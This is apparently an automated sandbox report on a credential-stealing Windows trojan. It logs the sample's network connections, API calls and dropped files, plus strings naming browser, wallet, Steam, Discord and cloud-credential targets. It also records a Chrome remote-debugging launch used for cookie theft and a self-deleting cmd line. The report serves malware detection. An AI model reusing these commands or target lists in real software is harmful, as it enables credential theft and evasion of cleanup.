Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 58958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58956
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58959
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58958
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58953
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58955
Source: unknown	Network traffic detected: HTTP traffic on port 58948 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58954
Source: unknown	Network traffic detected: HTTP traffic on port 58941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58961
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58957 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58972
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58956 -> 443

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.202.180.73:443 -> 192.168.2.4:49736 version: TLS 1.2

Source: C:\Users\user\Desktop\1.exe

Code function: 1_2_009CEAB5 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,ReleaseDC,CloseWindow,

1_2_009CEAB5

Source: C:\Users\user\Desktop\1.exe

Code function: 1_2_009C5AD3 memcpy,OpenDesktopA,CreateDesktopA,lstrcpy,CreateProcessA,Sleep,CloseDesktop,

1_2_009C5AD3

Source: C:\Users\user\Desktop\1.exe	Code function: 1_2_009C4B3F	1_2_009C4B3F
Source: C:\Users\user\Desktop\1.exe	Code function: 1_2_009D53AF	1_2_009D53AF
Source: C:\Users\user\Desktop\1.exe	Code function: 1_2_009D71E1	1_2_009D71E1
Source: C:\Users\user\Desktop\1.exe	Code function: 1_2_009D7D56	1_2_009D7D56
Source: C:\Users\user\Desktop\1.exe	Code function: 1_2_009D5147	1_2_009D5147
Source: C:\Users\user\Desktop\1.exe	Code function: 1_2_009CAF7E	1_2_009CAF7E

Source: 1.exe

Static PE information: invalid certificate

Source: 1.exe, 00000000.00000000.1671740106.0000000000410000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileName vs 1.exe
Source: 1.exe, 00000001.00000002.2305906778.0000000003BD1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs 1.exe
Source: 1.exe, 00000001.00000002.2305906778.0000000003CB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs 1.exe
Source: 1.exe, 00000001.00000002.2302254778.0000000003539000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCryptoSetup.dllj% vs 1.exe
Source: 1.exe	Binary or memory string: OriginalFileName vs 1.exe

Source: 1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED

Source: gvs0hv.1.dr

Binary string: #WriteOfflineHivesTerminateSetupModuleds\security\cryptoapi\cryptosetup\cryptosetup.cDCryptoSetup module terminatedCryptoSetupNewRegistryCallBackCryptoSetup EntropyWrite given invalid event typeCryptoSetup EntropyWrite given invalid event data sizeWriteEntropyToNewRegistryCryptoSetup failed to get Ksecdd entropy %08xRNGCryptoSetup failed to open system hive key %08xExternalEntropyCryptoSetup failed to write entropy into the system hive %08xCryptoSetup failed to close system hive key %08xCryptoSetup succeeded writing entropy key\Device\KsecDDWriteCapiMachineGuidCryptoSetup failed get entropy from ksecdd for CAPI machine guid %08x%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02xCryptoSetup failed to convert CAPI machine guid to string %08xMicrosoft\CryptographyCryptoSetup failed get open/create reg key for CAPI machine guid %08xMachineGuidCryptoSetup failed get write CAPI machine guid %08xCryptoSetup assigned CAPI machine guid "%s"

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@24/36@9/7

Source: C:\Users\user\Desktop\1.exe

Code function: 1_2_009CF0CA CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,

1_2_009CF0CA

Source: C:\Users\user\Desktop\1.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\X3VJXQLI.htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7952:120:WilError_03

Source: 1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\1.exe

File read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1002\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\1.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: chrome.exe, 00000002.00000002.1889029768.000060E80071D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: ohd2nglfk.1.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 1.exe	Virustotal: Detection: 41%
Source: 1.exe	ReversingLabs: Detection: 44%

Source: unknown	Process created: C:\Users\user\Desktop\1.exe "C:\Users\user\Desktop\1.exe"
Source: C:\Users\user\Desktop\1.exe	Process created: C:\Users\user\Desktop\1.exe "C:\Users\user\Desktop\1.exe"
Source: C:\Users\user\Desktop\1.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2348 --field-trial-handle=2328,i,17953878814576084473,5472811303795745123,262144 /prefetch:8
Source: C:\Users\user\Desktop\1.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\1.exe" & rd /s /q "C:\ProgramData\va1vs" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\1.exe	Process created: C:\Users\user\Desktop\1.exe "C:\Users\user\Desktop\1.exe"	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\1.exe" & rd /s /q "C:\ProgramData\va1vs" & exit	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\1.exe" & rd /s /q "C:\ProgramData\va1vs" & exit	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2348 --field-trial-handle=2328,i,17953878814576084473,5472811303795745123,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Source: C:\Users\user\Desktop\1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Users\user\Desktop\1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: 1.exe

Static file information: File size 1622632 > 1048576

Source: 1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: A{"id":1,"method":"Storage.getCookies"}\|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2comctl32gdi32:225121Windows 11HTTP/1.1HARDWARE\DESCRIPTION\System\CentralProcessor\0abcdefgh
Source:	Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdbA source: 1.exe, 00000000.00000002.1675155262.0000000011A50000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000000.00000002.1675155262.00000000119DA000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: op\vdr1\Release\vdr1.pdb source: 1.exe, 00000001.00000002.2300297883.00000000009DB000.00000002.00000400.00020000.00000000.sdmp
Source:	Binary string: vdr1.pdb source: 1.exe, 00000000.00000002.1675155262.0000000011A50000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000000.00000002.1675155262.00000000119DA000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: op\vdr1\Release\vdr1.pdbA source: 1.exe, 00000001.00000002.2300297883.00000000009DB000.00000002.00000400.00020000.00000000.sdmp
Source:	Binary string: cryptosetup.pdbGCTL source: 1.exe, 00000001.00000002.2302254778.0000000003539000.00000004.00000020.00020000.00000000.sdmp, gvs0hv.1.dr
Source:	Binary string: cryptosetup.pdb source: 1.exe, 00000001.00000002.2302254778.0000000003539000.00000004.00000020.00020000.00000000.sdmp, gvs0hv.1.dr
Source:	Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdb source: 1.exe, 00000000.00000002.1675155262.0000000011A50000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000000.00000002.1675155262.00000000119DA000.00000004.00001000.00020000.00000000.sdmp

Source: 1.exe

Static PE information: section name: .symtab

Persistence and Installation Behavior

AI detected suspicious PE digital signature

Source: Initial sample

Joe Sandbox AI: Detected suspicious elements in PE signature: Multiple suspicious indicators: 1) The signature is invalid with verification failure, which is a major red flag. 2) The compilation timestamp is set to Unix epoch (Jan 1, 1970), which is highly suspicious and likely manipulated. 3) While the issuer Certum is a known certificate authority and the country codes (DE, PL) are from reputable regions, the subject is listed as an individual 'Open Source Developer' rather than a verified organization, which provides less accountability. 4) The certificate dates (Oct 2024-Oct 2025) are valid for the current date, but combined with the invalid signature this suggests possible certificate theft or manipulation. The combination of invalid signature, suspicious compilation date, and individual developer certificate strongly suggests malicious intent.

Source: C:\Users\user\Desktop\1.exe

File created: C:\ProgramData\va1vs\gvs0hv

Jump to dropped file

Source: C:\Users\user\Desktop\1.exe

File created: C:\ProgramData\va1vs\gvs0hv

Jump to dropped file

Source: C:\Users\user\Desktop\1.exe

File created: C:\ProgramData\va1vs\gvs0hv

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Self deletion via cmd or bat file

Source: C:\Users\user\Desktop\1.exe	Process created: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\1.exe" & rd /s /q "C:\ProgramData\va1vs" & exit
Source: C:\Users\user\Desktop\1.exe	Process created: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\1.exe" & rd /s /q "C:\ProgramData\va1vs" & exit	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\1.exe" & rd /s /q "C:\ProgramData\va1vs" & exit	Jump to behavior

Source: C:\Users\user\Desktop\1.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\1.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\1.exe

Dropped PE file which has not been started: C:\ProgramData\va1vs\gvs0hv

Jump to dropped file

Source: C:\Windows\SysWOW64\timeout.exe TID: 7992

Thread sleep count: 91 > 30

Jump to behavior

Source: C:\Users\user\Desktop\1.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\1.exe	Code function: 1_2_009CA69C FindFirstFileA,StrCmpCA,CopyFileA,Sleep,DeleteFileA,FindNextFileA,FindClose,	1_2_009CA69C
Source: C:\Users\user\Desktop\1.exe	Code function: 1_2_009C7891 FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,	1_2_009C7891
Source: C:\Users\user\Desktop\1.exe	Code function: 1_2_009C6784 ExpandEnvironmentStringsA,FindFirstFileA,StrCmpCA,CopyFileA,DeleteFileA,Sleep,CopyFileA,memset,CopyFileA,DeleteFileA,memset,FindNextFileA,FindClose,	1_2_009C6784
Source: C:\Users\user\Desktop\1.exe	Code function: 1_2_009D1187 wsprintfA,FindFirstFileA,memset,memset,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,	1_2_009D1187
Source: C:\Users\user\Desktop\1.exe	Code function: 1_2_009C13DA FindFirstFileA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindClose,	1_2_009C13DA
Source: C:\Users\user\Desktop\1.exe	Code function: 1_2_009D3B10 SHGetFolderPathA,wsprintfA,FindFirstFileA,_mbscpy,_mbscpy,strlen,isupper,wsprintfA,_mbscpy,strlen,SHFileOperation,FindClose,	1_2_009D3B10
Source: C:\Users\user\Desktop\1.exe	Code function: 1_2_009C8776 FindFirstFileA,FindNextFileA,	1_2_009C8776
Source: C:\Users\user\Desktop\1.exe	Code function: 1_2_009C8224 FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_009C8224
Source: C:\Users\user\Desktop\1.exe	Code function: 1_2_009D2A5D wsprintfA,FindFirstFileA,StrCmpCA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_009D2A5D
Source: C:\Users\user\Desktop\1.exe	Code function: 1_2_009C9C78 wsprintfA,FindFirstFileA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	1_2_009C9C78
Source: C:\Users\user\Desktop\1.exe	Code function: 1_2_009D1BD2 wsprintfA,FindFirstFileA,FindNextFileA,FindClose,	1_2_009D1BD2
Source: C:\Users\user\Desktop\1.exe	Code function: 1_2_009D2539 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrlen,lstrlen,	1_2_009D2539

Source: C:\Users\user\Desktop\1.exe

Code function: 1_2_009D1722 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrlen,

1_2_009D1722

Source: C:\Users\user\Desktop\1.exe

Code function: 1_2_009CDF8C GetSystemInfo,wsprintfA,

1_2_009CDF8C

Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
